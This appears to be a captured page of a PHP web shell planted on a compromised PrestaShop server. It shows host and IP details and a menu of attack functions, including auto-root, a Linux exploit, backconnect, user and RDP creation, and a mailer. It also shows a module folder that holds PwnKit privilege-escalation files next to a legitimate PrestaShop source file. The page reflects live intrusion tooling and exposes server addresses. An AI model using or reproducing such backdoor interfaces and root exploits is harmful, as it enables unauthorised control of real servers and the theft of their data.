Linux ip-172-31-23-120.eu-west-1.compute.internal 5.10.245-245.983.amzn2.x86_64 #1 SMP Wed Dec 3 00:02:10 UTC 2025 x86_64
Apache/2.4.65 () OpenSSL/1.0.2k-fips
: 172.31.23.120 | : 64.252.114.129
Cant Read [ /etc/named.conf ]
8.2.29
apache
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
produccion /
presta /
modules /
vatnumber /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
translations
[ DIR ]
drwxrwxr--
views
[ DIR ]
drwxrwxr--
.mad-root
0
B
-rw-r--r--
CHANGELOG.txt
430
B
-rwxrwxr--
Readme.md
1.79
KB
-rwxrwxr--
VATNumberTaxManager.php
1.44
KB
-rwxrwxr--
ajax.php
1.16
KB
-rwxrwxr--
config.xml
591
B
-rwxrwxr--
config_.xml
564
B
-rwxrwxr--
config_es.xml
585
B
-rwxrwxr--
index.php
1.27
KB
-rwxrwxr--
logo.gif
1
KB
-rwxrwxr--
logo.png
1.71
KB
-rwxrwxr--
pwnkit
10.99
KB
-rwxr-xr-x
vatnumber.php
7.96
KB
-rwxrwxr--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : VATNumberTaxManager.php
<?php /* * 2007-2014 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <contact@prestashop.com> * @copyright 2007-2014 PrestaShop SA * @license http://opensource.org/licenses/afl-3.0.php Academic Free License (AFL 3.0) * International Registered Trademark & Property of PrestaShop SA */ class VATNumberTaxManager implements TaxManagerInterface { public static function isAvailableForThisAddress(Address $address) { return (!empty($address->vat_number) && $address->id_country != Configuration::get('VATNUMBER_COUNTRY') && Configuration::get('VATNUMBER_MANAGEMENT') ); } public function getTaxCalculator() { // If the address matches the european vat number criterias no taxes are applied $tax = new Tax(); $tax->rate = 0; return new TaxCalculator(array($tax)); } }
Close